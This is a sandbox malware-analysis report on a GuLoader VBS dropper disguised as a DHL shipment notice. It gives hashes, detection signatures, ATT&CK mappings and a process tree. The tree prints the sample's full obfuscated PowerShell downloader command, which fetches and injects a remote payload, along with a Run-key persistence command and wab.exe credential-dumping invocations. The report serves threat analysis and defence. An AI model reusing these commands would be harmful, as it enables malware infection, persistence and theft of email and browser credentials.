guloader | a7024900ce77051e0df54b2553c5c18a90dafdc92fd8deaa9db50c2da551b549

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
30/05/2024, 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs
Size

22KB
MD5

5a4ef048a5e3b38a1cfe3813955c1770
SHA1

86b17e10f9ce90466020115a3cfbd0ae124289cf
SHA256

a7024900ce77051e0df54b2553c5c18a90dafdc92fd8deaa9db50c2da551b549
SHA512

0c792d3d9ccef5130b655570dab5c22864696b5796bf0a02718e57a387c8944c3633de65e00a6dcf272f16155e927d818820311099df134776a62a6c4d2c7a64
SSDEEP

384:WryE8obOy6raaPOxBROArUfiyV9V4UXTDMm33/QCKPl84de6u8Y+9bkzxXXx5r6:WrwgO/aaPOxBNIdTDM634CKKSP9bsnxo

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1344-62-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/1824-56-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

resource	yara_rule
behavioral2/memory/1824-56-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1344-62-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/1548-57-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	4116	WScript.exe
22	4392	Powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dentures = "%Cheveril% -w 1 $Corgi18=(Get-ItemProperty -Path 'HKCU:\\Hovedsymptomets\\').Delested;%Cheveril% ($Corgi18)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4524	wab.exe
4524	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2364	powershell.exe
4524	wab.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2364 set thread context of 4524	2364	powershell.exe	97
PID 4524 set thread context of 1824	4524	wab.exe	103
PID 4524 set thread context of 1344	4524	wab.exe	104
PID 4524 set thread context of 1548	4524	wab.exe	105

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2520	reg.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4392	Powershell.exe
4392	Powershell.exe
2364	powershell.exe
2364	powershell.exe
2364	powershell.exe
1824	wab.exe
1824	wab.exe
1548	wab.exe
1548	wab.exe
1824	wab.exe
1824	wab.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
2364	powershell.exe
4524	wab.exe
4524	wab.exe
4524	wab.exe
4524	wab.exe
4524	wab.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4392	Powershell.exe
Token: SeDebugPrivilege	2364	powershell.exe
Token: SeDebugPrivilege	1548	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4524	wab.exe

Suspicious use of WriteProcessMemory 41 IoCs

description	pid	Process	procid_target
PID 4116 wrote to memory of 4392	4116	WScript.exe	89
PID 4116 wrote to memory of 4392	4116	WScript.exe	89
PID 4116 wrote to memory of 4392	4116	WScript.exe	89
PID 4392 wrote to memory of 4052	4392	Powershell.exe	93
PID 4392 wrote to memory of 4052	4392	Powershell.exe	93
PID 4392 wrote to memory of 4052	4392	Powershell.exe	93
PID 4392 wrote to memory of 2364	4392	Powershell.exe	94
PID 4392 wrote to memory of 2364	4392	Powershell.exe	94
PID 4392 wrote to memory of 2364	4392	Powershell.exe	94
PID 2364 wrote to memory of 2624	2364	powershell.exe	95
PID 2364 wrote to memory of 2624	2364	powershell.exe	95
PID 2364 wrote to memory of 2624	2364	powershell.exe	95
PID 2364 wrote to memory of 4524	2364	powershell.exe	97
PID 2364 wrote to memory of 4524	2364	powershell.exe	97
PID 2364 wrote to memory of 4524	2364	powershell.exe	97
PID 2364 wrote to memory of 4524	2364	powershell.exe	97
PID 2364 wrote to memory of 4524	2364	powershell.exe	97
PID 4524 wrote to memory of 3580	4524	wab.exe	98
PID 4524 wrote to memory of 3580	4524	wab.exe	98
PID 4524 wrote to memory of 3580	4524	wab.exe	98
PID 3580 wrote to memory of 2520	3580	cmd.exe	100
PID 3580 wrote to memory of 2520	3580	cmd.exe	100
PID 3580 wrote to memory of 2520	3580	cmd.exe	100
PID 4524 wrote to memory of 3368	4524	wab.exe	101
PID 4524 wrote to memory of 3368	4524	wab.exe	101
PID 4524 wrote to memory of 3368	4524	wab.exe	101
PID 4524 wrote to memory of 1656	4524	wab.exe	102
PID 4524 wrote to memory of 1656	4524	wab.exe	102
PID 4524 wrote to memory of 1656	4524	wab.exe	102
PID 4524 wrote to memory of 1824	4524	wab.exe	103
PID 4524 wrote to memory of 1824	4524	wab.exe	103
PID 4524 wrote to memory of 1824	4524	wab.exe	103
PID 4524 wrote to memory of 1824	4524	wab.exe	103
PID 4524 wrote to memory of 1344	4524	wab.exe	104
PID 4524 wrote to memory of 1344	4524	wab.exe	104
PID 4524 wrote to memory of 1344	4524	wab.exe	104
PID 4524 wrote to memory of 1344	4524	wab.exe	104
PID 4524 wrote to memory of 1548	4524	wab.exe	105
PID 4524 wrote to memory of 1548	4524	wab.exe	105
PID 4524 wrote to memory of 1548	4524	wab.exe	105
PID 4524 wrote to memory of 1548	4524	wab.exe	105

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Express_Shipment_Confirmation_Notification_904088477321.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4116
- C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe
  "C:\Windows\syswow64\windowsPowershell\v1.0\Powershell.exe" "$Clothespins='S';$Clothespins+='ubs';$Clothespins+='tri';$homophene = 1;$Clothespins+='ng';Function Flugtskuds($presocial){$Antidemocracy=$presocial.Length-$homophene;For( $Antologia=4;$Antologia -lt $Antidemocracy;$Antologia+=5){$hydriodate+=$presocial.$Clothespins.Invoke( $Antologia, $homophene);}$hydriodate;}function Smedemestres($Reshipment){ . ($Sulevllingens) ($Reshipment);}$Heltinders=Flugtskuds ' ArrMTouco DeazCal.iU,stl Sl.l Proa C.b/Befo5E ko.Phot0Udsa S,ba( idgWSolsiDesmn nddHippo DogwTidesHand P.nNUmlaTFunk Stam1 Hem0 Sem.St t0 Nau; Ind BillW EneiExtrnTer.6Symb4 Lit;macr Gon.xFarv6Frk.4N,ad;Unel BurerBea,vMind:O,yb1Forn2 Me.1poly.Purp0Sibe) ,mp ,xteGSki eCi.icFe.tkManto Phy/Hos 2Clyp0Sc r1kat 0Baud0Oldf1Lyse0Pot,1 Bar B lFMeasiC emrSluie UncfFa.voA,tix Pos/Riss1Fors2Man 1S.id.Spis0Ele, ';$Calusar124=Flugtskuds 'TrknUFo lsSp.ieU enr wal-P,rmANandgmedieLiponWarstvi e ';$Vejl37=Flugtskuds ' Te.h Tent .ostInd,pBali:Befl/Thom/ Th.sCor hR.vee S.or OveeDolmiCynohBjlkn GoaaViuvoMusc.ophirPrimuVari.Cr.wc Orao L,vm.get/ dmaB.esne.laddReceevisidsturaStatgTappsFelsf rone TonrDunti,rhveInt,rA vi. DrahHugehEge.k,hap ';$Alemannisk=Flugtskuds ' Log>Opha ';$Sulevllingens=Flugtskuds 'MedliPavee,oloxGaff ';$Tris='Cycloheptanone';$Privatskifters = Flugtskuds 'Serpe.nwhc ntehSkato Unp chou%FyrfaRundp r,wpBrindNor,aBrnetGalva Dat%dehi\immuLGra a ImpcU.potButte.fleaGidsl Tryl EskyTret.MannHF kuvU.enepero Noni&Mono&m.ni B.oeop,icNyhehEaseoE er VredtU.gu ';Smedemestres (Flugtskuds ' ami$KbslgCycllErupo penbExaeaExcul dfl:mor S Solu SmibLuftm DrueSulkrVenugIde eUmbes la=Au t( KilcFortmP rrd Unr .enr/truec Art Bes.$PodiPk nfr DyniE.tevUdmaaLim t.elasRabikTr gi CelfEasttLr.eeIncrr riesK,to)Rigs ');Smedemestres (Flugtskuds ' Cr.$Omb gAft l ateo Va.bChowaTr al Maf:Ss eSKatapIconiNe.rdUddasNja.vNytaityphnUnlikFliml A.aeInter kopnArcte nss Srv=Augu$Me,mVHaaneBrnejRep.l,dor3Stor7 Sam. DiasGydepAdvelLulliSvejtBrys(Godc$VillAindilNonae AngmSkolaU,brn BannKodeiLor,sDirtkGrun) Tit ');$Vejl37=$Spidsvinklernes[0];$Nutrice236= (Flugtskuds 'B.ec$BjergFor lExuco Pa,bS.ppaKamrlSer :PlayL RabyPersmTerrp th.h dsoFagogGy.ar C uaJabbnSwaguClomlt,anoMo.nmAntaaMetrtAnsva.pho=HerbNAnteeMar,wBrne-subrOBlyfb PukjPyroeRickcPyknt S.n NonS.orgy eresbrsitBogseBladmPe,s.Un eN eveeHim.t Afs.BygnWIngee FllbFastCIntel.vari ereeDroenBug,t');$Nutrice236+=$Submerges[1];Smedemestres ($Nutrice236);Smedemestres (Flugtskuds 'Re,s$DampLR,sdyUncomAffap HughDraaoEnkegBepurRe saInven Diau Do.l .pro Kasmzyg,aLuftt Se,aOver.StatHprobe ntiaPro.dGla eUhanrf.rjsKont[ Rei$Spr,CBio.a StalSimiuMisbsAmtsaVerir pr1Tvun2 Up 4 Cu.] R,e= Ly.$FremHUtmme onslIs,ut disiWaggn C.ndNonseAntirPorts Gr ');$Plotterne=Flugtskuds 'subd$Vo dL saybo.umMontpN,nah GuboRatiganstrBffeaNonanStikuBin.lilioojustmfor.a De.tgrnlaKo,t.CiliDBetaoLat.wBestn canlBlueoHip a.orsdWardFSnd iPr.vl SpeeFred(Hayb$D,ipVB.gseEpisjhimmlAmph3me,r7Eddi, St.$VildSUlyktSpl,eS,ivr SwaeCyl oTilftpranyTalepKliniT,xicLeuk1Dels7san 1Nonv)supr ';$Stereotypic171=$Submerges[0];Smedemestres (Flugtskuds 'Eyvi$K engInculAniso Ur,bD.huaUnpllTilt:RollN DiroTru.nMyntpp.oblFluoapolitJustik,detBsseuDessd SkniTedanBrono.emeuOlefsNorf= Poi( ellTValueBurmsTorbt emn-FeliPK,mbawankt JrphBloo Wafe$ othSImplt OdoeUdtyrMonteFr ro LeatKuley .ffp ludi aakc mvi1 kan7,ege1R,co) Par ');while (!$Nonplatitudinous) {Smedemestres (Flugtskuds 'Park$NatigReellI.sioFrstbDecaaSupelmaal:OverUGa,nnSeisd Un,emyofrSteisVerttKirti,irkmFibruFodnlEkspeTor r.armeHanetBuld= Occ$Sioutpartrb tauSvume Sti ') ;Smedemestres $Plotterne;Smedemestres (Flugtskuds 'Oks S Nontt,nka Genr ,trtMudp- StuS WollBorgete.ie,uttpSeks Imp 4Ging ');Smedemestres (Flugtskuds 'M.nn$Re.tgRagol MicoBenob Blua.alelAger:SkytN FanoE conExtrpLokalManvaPeg,tSmdeiSek tRomauSoeddPo.ei FainD,vaoNikkumyelsHarc=Ecre(SkruTBukseAntisMlk t Pil- laPHephaB ndt Grehcayu Remo$Par,SBe etLseleCullrstaceRosmoArgotOutby onp AuriOve,cBo z1Plat7skri1Deso)Skov ') ;Smedemestres (Flugtskuds ' Lys$Spe,ganimlUn,ao GenbDiplaBr.vlHipp: FroS S,eaPe cf skrtBlanfG.stuTotrl T,edOvereIncosMarit Ufo=Abi.$ oeng St lToldoSingbMultaD,stl Und:.remR Udfuk bibMo eyIsthtO.hjhUnglrSl eoBeskaSpokt,tom1Ngen9Shod1Stan+Weat+Opdr%.rib$ Pi,SMercpAstii prodYngls OttvSvibiRednnSki.k Mo l Te,eOphirCa,enPlice Fa.sIntr.S iccAutoo FjeuA,onnExcotrigh ') ;$Vejl37=$Spidsvinklernes[$Saftfuldest];}$Terpede=284535;$Forestillet=28017;Smedemestres (Flugtskuds 'Blom$SnapgSordl,ruboDommb deea.adml Alk:Kl,oJMrkvoSubar SemdFastp CorrGonoi,idesAnci Over=Budg DoatG Vane IsetF au-KlagC.istoR,lanRef t.agaeBinonCordtLuch Pu.i$LgekS Valt ComeCrosrFl,re FusoS xat GanySmmop EariDjibc,ill1 ,od7Beg,1Sadi ');Smedemestres (Flugtskuds 'Ru,f$UnfigReeslIngvodkkebThuna F.nlS.tt:mortOEn,okSarrkAbsau DyspTrivebarbrSpe.iModunAi.hg,tjeeAngrr Ca.sT,ut Prin= Vmm S,pr[AtteSMystyGu.dsbefrtStereOen mS if.SquaCCo doSkilnTe,nv MideOverrAggrt Opl] Sub:Tear:GadeFairvrVegeoTottmLumbBIn,oaUntas TereHuar6Sted4 RepSBr.ct o hr An.i Carnsifog Kni(Baga$remoJfibro BlirSnumdMimep ,alrSkoliAa es Men)Spie ');Smedemestres (Flugtskuds 'Comp$Semig nnel.ranoSpgeb Gova ClilTon.:PennDOprre AmisS yloF,rirLb.igantia Du nIlseiLi.bsS,eneUncorKiw.e .serSoci Iref=Pre. Afri[LikvS D.ryO.ihs.utttFibieUnlimBeta.RundTCoryeEmanx Nerte sp.PiccEGalanDrikcS ggoDanid .igiDuvenHypogShor] Cou: Cle:FrapA UptSAgenCVurdI EksIH mp.OktaGGgedeTifftPresS reftFornrVertiUntonVan,gTi.w( He.$RevuODgnkkPlouksu euSerapSvigeN.tirSundiMuninMaalg PytefranrPs,uskomm)Blid ');Smedemestres (Flugtskuds 'Rete$ ,ongCabalAchlo Genb enaDagsl Sel: FasBUdtreforbs Fr,pPolyiPac c ymbeTog =Koll$s,raDKumee.rgos UnhoLolarNoncg.lleaDisenBileiLu,usFlj.eBai.rDdmaeAmy,rZemi.TonesdrukuKalkbMesssSwadtGustrCentiLambnDe,agTra (Rust$SkatT.ofteChrirTanapSpale Band E.teSvol,Fors$.racFpreooK serBri.eEksesPhiltKlini ,aklCam,lNondeForatRest)Dipl ');Smedemestres $Bespice;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lacteally.Hve && echo t"
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Clothespins='S';$Clothespins+='ubs';$Clothespins+='tri';$homophene = 1;$Clothespins+='ng';Function Flugtskuds($presocial){$Antidemocracy=$presocial.Length-$homophene;For( $Antologia=4;$Antologia -lt $Antidemocracy;$Antologia+=5){$hydriodate+=$presocial.$Clothespins.Invoke( $Antologia, $homophene);}$hydriodate;}function Smedemestres($Reshipment){ . ($Sulevllingens) ($Reshipment);}$Heltinders=Flugtskuds ' ArrMTouco DeazCal.iU,stl Sl.l Proa C.b/Befo5E ko.Phot0Udsa S,ba( idgWSolsiDesmn nddHippo DogwTidesHand P.nNUmlaTFunk Stam1 Hem0 Sem.St t0 Nau; Ind BillW EneiExtrnTer.6Symb4 Lit;macr Gon.xFarv6Frk.4N,ad;Unel BurerBea,vMind:O,yb1Forn2 Me.1poly.Purp0Sibe) ,mp ,xteGSki eCi.icFe.tkManto Phy/Hos 2Clyp0Sc r1kat 0Baud0Oldf1Lyse0Pot,1 Bar B lFMeasiC emrSluie UncfFa.voA,tix Pos/Riss1Fors2Man 1S.id.Spis0Ele, ';$Calusar124=Flugtskuds 'TrknUFo lsSp.ieU enr wal-P,rmANandgmedieLiponWarstvi e ';$Vejl37=Flugtskuds ' Te.h Tent .ostInd,pBali:Befl/Thom/ Th.sCor hR.vee S.or OveeDolmiCynohBjlkn GoaaViuvoMusc.ophirPrimuVari.Cr.wc Orao L,vm.get/ dmaB.esne.laddReceevisidsturaStatgTappsFelsf rone TonrDunti,rhveInt,rA vi. DrahHugehEge.k,hap ';$Alemannisk=Flugtskuds ' Log>Opha ';$Sulevllingens=Flugtskuds 'MedliPavee,oloxGaff ';$Tris='Cycloheptanone';$Privatskifters = Flugtskuds 'Serpe.nwhc ntehSkato Unp chou%FyrfaRundp r,wpBrindNor,aBrnetGalva Dat%dehi\immuLGra a ImpcU.potButte.fleaGidsl Tryl EskyTret.MannHF kuvU.enepero Noni&Mono&m.ni B.oeop,icNyhehEaseoE er VredtU.gu ';Smedemestres (Flugtskuds ' ami$KbslgCycllErupo penbExaeaExcul dfl:mor S Solu SmibLuftm DrueSulkrVenugIde eUmbes la=Au t( KilcFortmP rrd Unr .enr/truec Art Bes.$PodiPk nfr DyniE.tevUdmaaLim t.elasRabikTr gi CelfEasttLr.eeIncrr riesK,to)Rigs ');Smedemestres (Flugtskuds ' Cr.$Omb gAft l ateo Va.bChowaTr al Maf:Ss eSKatapIconiNe.rdUddasNja.vNytaityphnUnlikFliml A.aeInter kopnArcte nss Srv=Augu$Me,mVHaaneBrnejRep.l,dor3Stor7 Sam. DiasGydepAdvelLulliSvejtBrys(Godc$VillAindilNonae AngmSkolaU,brn BannKodeiLor,sDirtkGrun) Tit ');$Vejl37=$Spidsvinklernes[0];$Nutrice236= (Flugtskuds 'B.ec$BjergFor lExuco Pa,bS.ppaKamrlSer :PlayL RabyPersmTerrp th.h dsoFagogGy.ar C uaJabbnSwaguClomlt,anoMo.nmAntaaMetrtAnsva.pho=HerbNAnteeMar,wBrne-subrOBlyfb PukjPyroeRickcPyknt S.n NonS.orgy eresbrsitBogseBladmPe,s.Un eN eveeHim.t Afs.BygnWIngee FllbFastCIntel.vari ereeDroenBug,t');$Nutrice236+=$Submerges[1];Smedemestres ($Nutrice236);Smedemestres (Flugtskuds 'Re,s$DampLR,sdyUncomAffap HughDraaoEnkegBepurRe saInven Diau Do.l .pro Kasmzyg,aLuftt Se,aOver.StatHprobe ntiaPro.dGla eUhanrf.rjsKont[ Rei$Spr,CBio.a StalSimiuMisbsAmtsaVerir pr1Tvun2 Up 4 Cu.] R,e= Ly.$FremHUtmme onslIs,ut disiWaggn C.ndNonseAntirPorts Gr ');$Plotterne=Flugtskuds 'subd$Vo dL saybo.umMontpN,nah GuboRatiganstrBffeaNonanStikuBin.lilioojustmfor.a De.tgrnlaKo,t.CiliDBetaoLat.wBestn canlBlueoHip a.orsdWardFSnd iPr.vl SpeeFred(Hayb$D,ipVB.gseEpisjhimmlAmph3me,r7Eddi, St.$VildSUlyktSpl,eS,ivr SwaeCyl oTilftpranyTalepKliniT,xicLeuk1Dels7san 1Nonv)supr ';$Stereotypic171=$Submerges[0];Smedemestres (Flugtskuds 'Eyvi$K engInculAniso Ur,bD.huaUnpllTilt:RollN DiroTru.nMyntpp.oblFluoapolitJustik,detBsseuDessd SkniTedanBrono.emeuOlefsNorf= Poi( ellTValueBurmsTorbt emn-FeliPK,mbawankt JrphBloo Wafe$ othSImplt OdoeUdtyrMonteFr ro LeatKuley .ffp ludi aakc mvi1 kan7,ege1R,co) Par ');while (!$Nonplatitudinous) {Smedemestres (Flugtskuds 'Park$NatigReellI.sioFrstbDecaaSupelmaal:OverUGa,nnSeisd Un,emyofrSteisVerttKirti,irkmFibruFodnlEkspeTor r.armeHanetBuld= Occ$Sioutpartrb tauSvume Sti ') ;Smedemestres $Plotterne;Smedemestres (Flugtskuds 'Oks S Nontt,nka Genr ,trtMudp- StuS WollBorgete.ie,uttpSeks Imp 4Ging ');Smedemestres (Flugtskuds 'M.nn$Re.tgRagol MicoBenob Blua.alelAger:SkytN FanoE conExtrpLokalManvaPeg,tSmdeiSek tRomauSoeddPo.ei FainD,vaoNikkumyelsHarc=Ecre(SkruTBukseAntisMlk t Pil- laPHephaB ndt Grehcayu Remo$Par,SBe etLseleCullrstaceRosmoArgotOutby onp AuriOve,cBo z1Plat7skri1Deso)Skov ') ;Smedemestres (Flugtskuds ' Lys$Spe,ganimlUn,ao GenbDiplaBr.vlHipp: FroS S,eaPe cf skrtBlanfG.stuTotrl T,edOvereIncosMarit Ufo=Abi.$ oeng St lToldoSingbMultaD,stl Und:.remR Udfuk bibMo eyIsthtO.hjhUnglrSl eoBeskaSpokt,tom1Ngen9Shod1Stan+Weat+Opdr%.rib$ Pi,SMercpAstii prodYngls OttvSvibiRednnSki.k Mo l Te,eOphirCa,enPlice Fa.sIntr.S iccAutoo FjeuA,onnExcotrigh ') ;$Vejl37=$Spidsvinklernes[$Saftfuldest];}$Terpede=284535;$Forestillet=28017;Smedemestres (Flugtskuds 'Blom$SnapgSordl,ruboDommb deea.adml Alk:Kl,oJMrkvoSubar SemdFastp CorrGonoi,idesAnci Over=Budg DoatG Vane IsetF au-KlagC.istoR,lanRef t.agaeBinonCordtLuch Pu.i$LgekS Valt ComeCrosrFl,re FusoS xat GanySmmop EariDjibc,ill1 ,od7Beg,1Sadi ');Smedemestres (Flugtskuds 'Ru,f$UnfigReeslIngvodkkebThuna F.nlS.tt:mortOEn,okSarrkAbsau DyspTrivebarbrSpe.iModunAi.hg,tjeeAngrr Ca.sT,ut Prin= Vmm S,pr[AtteSMystyGu.dsbefrtStereOen mS if.SquaCCo doSkilnTe,nv MideOverrAggrt Opl] Sub:Tear:GadeFairvrVegeoTottmLumbBIn,oaUntas TereHuar6Sted4 RepSBr.ct o hr An.i Carnsifog Kni(Baga$remoJfibro BlirSnumdMimep ,alrSkoliAa es Men)Spie ');Smedemestres (Flugtskuds 'Comp$Semig nnel.ranoSpgeb Gova ClilTon.:PennDOprre AmisS yloF,rirLb.igantia Du nIlseiLi.bsS,eneUncorKiw.e .serSoci Iref=Pre. Afri[LikvS D.ryO.ihs.utttFibieUnlimBeta.RundTCoryeEmanx Nerte sp.PiccEGalanDrikcS ggoDanid .igiDuvenHypogShor] Cou: Cle:FrapA UptSAgenCVurdI EksIH mp.OktaGGgedeTifftPresS reftFornrVertiUntonVan,gTi.w( He.$RevuODgnkkPlouksu euSerapSvigeN.tirSundiMuninMaalg PytefranrPs,uskomm)Blid ');Smedemestres (Flugtskuds 'Rete$ ,ongCabalAchlo Genb enaDagsl Sel: FasBUdtreforbs Fr,pPolyiPac c ymbeTog =Koll$s,raDKumee.rgos UnhoLolarNoncg.lleaDisenBileiLu,usFlj.eBai.rDdmaeAmy,rZemi.TonesdrukuKalkbMesssSwadtGustrCentiLambnDe,agTra (Rust$SkatT.ofteChrirTanapSpale Band E.teSvol,Fors$.racFpreooK serBri.eEksesPhiltKlini ,aklCam,lNondeForatRest)Dipl ');Smedemestres $Bespice;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2364
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lacteally.Hve && echo t"
      4⤵
      PID:2624
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4524
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dentures" /t REG_EXPAND_SZ /d "%Cheveril% -w 1 $Corgi18=(Get-ItemProperty -Path 'HKCU:\Hovedsymptomets\').Delested;%Cheveril% ($Corgi18)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3580
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Dentures" /t REG_EXPAND_SZ /d "%Cheveril% -w 1 $Corgi18=(Get-ItemProperty -Path 'HKCU:\Hovedsymptomets\').Delested;%Cheveril% ($Corgi18)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2520
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qirddwg"
        5⤵
        
        PID:3368
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qirddwg"
        5⤵
        
        PID:1656
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qirddwg"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1824
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\acwvdprfnh"
        5⤵
        Accesses Microsoft Outlook accounts
        
        PID:1344
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lebgehkgbpgvh"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
0822fbeabb2851cf23a2c3dcbaea7dcd

SHA1
5d27970ad2092a59183a376ced6b8d121dd20097

SHA256
3735b33bbc13d32f0cbc88401379aa7d2eb86c825d63986fd062f34cdf7c4603

SHA512
47ef2ceac83c85847736e26ace527fd6730b003c096a2152df54a92ec1e60648506c95265f9ad1265c65b8dee3fd31ee7a965ce05ec1a22a9ae46391bb4de486

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkutaky1.zig.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qirddwg

Filesize
4KB

MD5
a13985d129d8bf808cec12f9fe7b4ed3

SHA1
3981490aa1ce9401c4470f0277fda627d9236356

SHA256
d3a2b4e44262cfbfb97652de5f54b36bfc525396d1d70dea03ab24c902dab8ef

SHA512
5c990ca4e978b874e0863ad4bf1ccbe04499960d5c17fb16776297d22db5f168aa3a5a9863ec5a9f8286dda2f9fd96852f2dc2ef029c13ba659e33694c344887

Download Submit
C:\Users\Admin\AppData\Roaming\Lacteally.Hve

Filesize
406KB

MD5
f6b1bbc5b150013484e75df1e46cf10d

SHA1
22d721a50b9334333e211559f426eeb1f3e04135

SHA256
a8e38cc88496b3c517405e00172e31c6b723c87acc3b9a57fabab8cd26bba715

SHA512
5b322a2148e51eadf2dcdc2ff5f6dc2165bf9595a6a8f20bed7ea73b00747c92133051a6e27e1eb058ecdea1fe449cfa0efb0739d7c9129f5b2b686518dfcc98

Download Submit
memory/1344-52-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1344-58-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
